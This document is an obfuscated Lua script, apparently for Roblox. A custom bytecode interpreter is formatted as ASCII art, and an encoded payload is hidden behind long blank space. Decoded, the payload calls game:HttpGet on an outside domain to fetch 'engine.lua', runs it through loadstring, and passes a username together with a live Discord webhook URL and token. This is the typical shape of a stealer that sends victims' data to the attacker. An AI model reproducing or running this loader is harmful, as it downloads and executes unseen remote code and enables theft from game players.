                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall; 
                                                          local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local       
                                                        function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if  
                                                      (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));      
                                                    return "";end end else local v70=v2(v0(v30,16));if v19 then local v80=v5(v70,v19);v19=nil;    
                                                  return v80;else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31 
                                                  /((5 -3)^(v32-((119 -(32 + 85)) -1))))%((3 -1)^(((v33-(1638 -(1523 + 114))) -(v32-(2 -1))) + (620 - 
                                                (555 + 64)))) ;return v71-(v71%1) ;else local v72=0 -0 ;local v73;while true do if (v72==(931 -(857 +   
                                                73 + 1))) then v73=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v73 + v73))>=v73) and (    
                                              1271 -(226 + 232 + 812))) or (0 -0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 +  
                                              1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (959 -(892 + 65)) ;return  
                                            (v36 * (610 -354)) + v35 ;end local function v23()local v37=0 -(0 -0) ;local v38;local v39;local v40;local v41;   
                                            while true do if (v37==(1 -0)) then return (v41 * ((30433887 -13656321) -(87 + 192 + 71))) + (v40 * (65716 -(67 +   
                                          113))) + (v39 * (188 + 68)) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11 
                                          ) ;v37=953 -(802 + 150) ;end end end local function v24()local v42=997 -(915 + 82) ;local v43;local v44;local v45;local   
                                          v46;local v47;local v48;while true do if (v42==(8 -5)) then if (v47==(0 + 0)) then if (v46==(0 -0)) then return v48 * (0 -0 
                                          ) ;else local v98=1187 -(1069 + 118) ;while true do if (v98==(0 -0)) then v47=(8 + 852) -(814 + 45) ;v45=0 -0 ;break;end    
                                        end end elseif (v47==(4477 -2430)) then return ((v46==(0 + 0)) and (v48 * ((1 + 0)/(0 -(0 + 0))))) or (v48 * NaN) ;end return   
                                        v8(v48,v47-(2103 -(1020 + 60)) ) * (v45 + (v46/((2 + 0)^(843 -((1423  --[[==============================]]-(87 + 968)) + 423))))) 
                                         ;end if (v42==(3 -2)) then v45=19 -(10 + 8) ;v46=(v20(v44, --[[============================================]]3 -2 ,462 -(416 +   
                                        26) ) * (2^((448 -346) -70))) + v43 ;v42=2 + 0 ;end if  --[[======================================================]](v42==(1 + (2 - 
                                      1))) then v47=v20(v44,1768 -(760 + 987) ,54 -23 );v48 --[[==========================================================]]=((v20(v44,798 -( 
                                      745 + 21) )==1) and  -((1852 -(447 + 966)) -(145 +  --[[==============================================================]]293))) or (2 -1 
                                      ) ;v42=433 -(44 + 386) ;end if (v42==(1486 -(998 +  --[[================================================================]](1335 -847))))  
                                      then v43=v23();v44=v23();v42=1 + 0 ;end end end     --[[==================================================================]]local         
                                      function v25(v49)local v50;if  not v49 then local   --[[==================================================================]]v74=1817 -(1703   
                                     + (250 -136)) ;while true do if (v74==((715 -(9 + 5) --[[====================================================================]]) -((752 -(85 
                     + 291)) + 325))) then v49=v23();if (v49==((1265 -(243 + 1022)) -0))  --[[====================================================================]]then return ""; 
              end break;end end end v50=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;  --[[======================================================================]]local v51={}; 
            for v67=1 + 0 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);  --[[======================================================================]]end local v26 
          =v23;local function v27(...)return {...},v12("#",...);end local function v28()  --[[======================================================================]]local v52=0 + 
         0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while   --[[======================================================================]]true do if (  
        v52==(563 -(306 + 254))) then v59=nil;while true do local v81=0;while true do if  --[[======================================================================]](v81==(0 + 0) 
      ) then if (v53==1) then local v105=0;while true do if (v105==(3 -1)) then v53=2 + 0 --[[======================================================================]] ;break;end   
      if ((1468 -(899 + 568))~=v105) then else for v109=1 + 0 ,v58 do local v110=0;local    --[[==================================================================]]v111;local v112 
      ;local v113;local v114;while true do if (v110==0) then v111=0 + 0 ;v112=nil;v110=1 +  --[[================================================================]]0 ;end if (v110== 
    (1 + 0)) then local v116=0 + 0 ;while true do if ((2 -1)==v116) then v110=2;break;end   --[[==============================================================]]if (v116~=(603 -( 
    268 + 335))) then else v113=nil;v114=nil;v116=2 -1 ;end end end if (v110~=(292 -(60 + 230 --[[==========================================================]]))) then else while 
     true do if (v111~=(572 -(426 + 146))) then else v112=0;v113=nil;v111=1 + 0 ;end if (v111~= --[[====================================================]](1457 -(282 + 1174)))   
    then else v114=nil;while true do if (v112==(754 -(239 + 514))) then if (v113==(812 -(569 +    --[[==============================================]]242))) then v114=v21()~=( 
    0 -0) ;elseif (v113==2) then v114=v24();elseif (v113==(1 + 2)) then v114=v25();end v59[v109]=v114 --[[====================================]];break;end if (v112==(0 + 0)) 
     then local v167=0;local v168;while true do if (v167==(1329 -(797 + 532))) then v168=0 + 0 ;while     --[[========================]]true do if (v168~=(0 + 0)) then else  
    local v178=0 -0 ;local v179;while true do if ((1024 -(706 + 318))==v178) then v179=1251 -(721 + 530) ;while true do if (v179==(1272 -(945 + 326))) then v168=2 -1 ;     
  break;end if (v179==(0 + 0)) then v113=v21();v114=nil;v179=701 -(271 + 429) ;end end break;end end end if (v168~=(1 + 0)) then else v112=1;break;end end break;end end  
  end end break;end end break;end end end v57[3]=v21();v105=2 -0 ;end if ((0 -0)==v105) then v58=v23();v59={};v105=239 -(64 + 174) ;end end end if (v53~=(1500 -(1408 + 
   92))) then else v54={};v55={};v56={};v57={v54,v55,nil,v56};v53=1 + 0 ;end v81=1;end if (v81==(1 + 0)) then if (v53~=(1 + 1)) then else local v106=0;local v107;while   
  true do if (v106==(0 + 0)) then v107=336 -(144 + 192) ;while true do local v115=529 -(406 + 123) ;while true do if (0~=v115) then else if (v107==(0 + 0)) then local    
  v139=0;while true do if (v139==(1769 -(1749 + 20))) then for v169=1 + 0 ,v23() do local v170=0;local v171;local v172;while true do if (v170==1) then while true do if ( 
  v171~=(0 + 0)) then else v172=v21();if (v20(v172,1323 -(1249 + 73) ,1581 -(1183 + 397) )~=(0 -0)) then else local v180=0 + 0 ;local v181;local v182;local v183;local    
  v184;while true do if (v180==2) then while true do if (v181~=(1147 -(466 + 679))) then else local v185=0 + 0 ;local v186;while true do if (v185==(1975 -(1913 + 62)))   
  then v186=0 -0 ;while true do if (v186==(0 -0)) then if (v20(v183,1901 -(106 + 1794) ,1 + 0 )==1) then v184[1 + 1 ]=v59[v184[5 -3 ]];end if (v20(v183,7 -5 ,2)==(1662 - 
  (1477 + 184))) then v184[3]=v59[v184[3 -0 ]];end v186=2 -1 ;end if (v186==(115 -(4 + 110))) then v181=3;break;end end break;end end end if (v181~=(587 -(57 + 527)))    
  then else if (v20(v183,1430 -(41 + 1386) ,859 -(564 + 292) )~=1) then else v184[107 -(17 + 86) ]=v59[v184[3 + 1 ]];end v54[v169]=v184;break;end if (v181~=(1 -0)) then  
  else v184={v22(),v22(),nil,nil};if (v182==0) then local v192=1125 -(936 + 189) ;local v193;local v194;local v195;while true do if (v192==(1 -0)) then v195=nil;while    
  true do if ((0 -0)==v193) then local v203=0 + 0 ;while true do if (v203==(0 + 0)) then v194=0;v195=nil;v203=1 -0 ;end if (v203~=(66 -(30 + 35))) then else v193=1;break;  
  end end end if (v193==1) then while true do if (v194==(267 -(176 + 91))) then v195=0 + 0 ;while true do if (v195==(1257 -(1043 + 214))) then v184[3]=v22();v184[4]=v22(); 
  break;end end break;end end break;end end break;end if (v192~=0) then else v193=0 -0 ;v194=nil;v192=1;end end elseif (v182==1) then v184[1095 -(975 + 117) ]=v23();elseif 
   (v182==(7 -5)) then v184[1215 -(323 + 889) ]=v23() -(2^(42 -26)) ;elseif (v182~=(583 -(361 + 219))) then else local v204=320 -(53 + 267) ;local v205;while true do if (  
  v204~=(0 + 0)) then else v205=413 -(15 + 398) ;while true do if (v205~=(1018 -(697 + 321))) then else v184[985 -(18 + 964) ]=v23() -(2^(33 -17)) ;v184[14 -10 ]=v22();    
  break;end end break;end end end v181=2;end if ((0 + 0)==v181) then local v188=0 + 0 ;local v189;while true do if (0==v188) then v189=0 + 0 ;while true do if (v189==(1228 
   -(322 + 905))) then v181=612 -(602 + 9) ;break;end if (v189==(850 -(20 + 830))) then local v198=0;while true do if (v198~=(1 + 0)) then else v189=127 -(116 + 10) ;break 
  ;end if (v198==0) then v182=v20(v172,2,1192 -(449 + 740) );v183=v20(v172,876 -(826 + 46) ,1 + 5 );v198=739 -(542 + 196) ;end end end end break;end end end end break;end  
  if ((1 + 0)~=v180) then else v183=nil;v184=nil;v180=2;end if (0==v180) then v181=1898 -(260 + 1638) ;v182=nil;v180=1;end end end break;end end break;end if (v170~=0)     
  then else local v177=440 -(382 + 58) ;while true do if (v177==0) then v171=0;v172=nil;v177=1 -0 ;end if ((1 + 0)==v177) then v170=1 + 0 ;break;end end end end end for    
  v173=1 -0 ,v23() do v55[v173-(1 + 0) ]=v28();end v139=2 -1 ;end if (v139==1) then v107=1;break;end end end if (v107==(2 -1)) then return v57;end break;end end end break; 
  end end end break;end end end break;end if ((1553 -(1126 + 425))~=v52) then else local v75=0 -0 ;while true do if (v75==(2 -1)) then v52=1 + 2 ;break;end if (v75==(405 - 
  (118 + 287))) then v57=nil;v58=nil;v75=215 -(22 + 192) ;end end end if (1==v52) then v55=nil;v56=nil;v52=7 -5 ;end if (v52==(1121 -(118 + 1003))) then local v76=0 -0 ;   
  while true do if (v76==(377 -(142 + 235))) then v53=0 -0 ;v54=nil;v76=4 -3 ;end if (v76==1) then v52=766 -(468 + 297) ;break;end end end end end local function v29(v60 
  ,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v82=v64;local v83=v65;local v84=v66;local v85=   
  v27;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[  
    v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do local v97=0;while true do if (v97==1) then if (v95<=9) then  
    if (v95<=4) then if (v95<=1) then if (v95==0) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end else v92[v94[2]]=v94[3];end elseif (v95<=2) then    
    v62[v94[3]]=v92[v94[2]];elseif (v95>3) then v92[v94[2]]=v62[v94[3]];else local v143=0;local v144;local v145;while true do if (v143==1) then v92[v144 + 1 ]=v145;v92[  
    v144]=v145[v94[4]];break;end if (0==v143) then v144=v94[2];v145=v92[v94[3]];v143=1;end end end elseif (v95<=6) then if (v95==5) then v62[v94[3]]=v92[v94[2]];else v92 
      [v94[2]]();end elseif (v95<=7) then local v123=0;local v124;local v125;local v126;local v127;while true do if (v123==1) then v87=(v126 + v124) -1 ;v127=0;v123=2; 
      end if (2==v123) then for v158=v124,v87 do local v159=0;while true do if (v159==0) then v127=v127 + 1 ;v92[v158]=v125[v127];break;end end end break;end if (v123  
      ==0) then v124=v94[2];v125,v126=v85(v92[v124](v13(v92,v124 + 1 ,v94[3])));v123=1;end end elseif (v95>8) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86= 
        v94[3];end else local v146=v94[2];v92[v146]=v92[v146](v13(v92,v146 + 1 ,v87));end elseif (v95<=14) then if (v95<=11) then if (v95>10) then local v128=v94[2];   
        local v129,v130=v85(v92[v128](v13(v92,v128 + 1 ,v94[3])));v87=(v130 + v128) -1 ;local v131=0;for v136=v128,v87 do v131=v131 + 1 ;v92[v136]=v129[v131];end else  
        v92[v94[2]]();end elseif (v95<=12) then do return;end elseif (v95>13) then v92[v94[2]]=v62[v94[3]];else v86=v94[3];end elseif (v95<=16) then if (v95>15) then   
          do return;end else v92[v94[2]]=v94[3];end elseif (v95<=17) then local v134=v94[2];v92[v134]=v92[v134](v13(v92,v134 + 1 ,v87));elseif (v95>18) then v86=v94[ 
            3];else local v152=v94[2];local v153=v92[v94[3]];v92[v152 + 1 ]=v153;v92[v152]=v153[v94[4]];end v86=v86 + 1 ;break;end if (v97==0) then v94=v82[v86];v95= 
              v94[1];v97=1;end end end end;end if (0==v63) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15(                        
                                                                                                                                                                      
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                              
                                                                                                                                                              
                                                                                                                                                            
                                                                                                                                                            
                                                                                                                                                          
                                                                                                                                                      
                                                                                                                                                  
                                                                                                                                          
                                                                                            
                                                                                          
                                                                                        
                                                                                  


--------------------------------------------------------------------------------
"LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F6A616E65712E73706163652F656E67696E652E6C756103083O00557365724E616D6503103O007B417A7572506C61797354686973337D03073O00576562682O6F6B037B3O007B682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132373331353935373439373436323738342F50555270384F50726F685372486E412D6578515F5731437970786A397755695065766D6A653448546D7331656F61445948537A4C50515F7672327A576B72716A743559347D00143O00120F3O00013O0026093O000B0001000200040D3O000B0001001204000100033O001204000200043O00200300020002000500120F000400064O0007000200044O001100013O00022O000600010001000100040D3O001300010026093O00010001000100040D3O0001000100120F000100083O001205000100073O00120F0001000A3O001205000100093O00120F3O00023O00040D3O000100012O00103O00017O00",v9(),...);
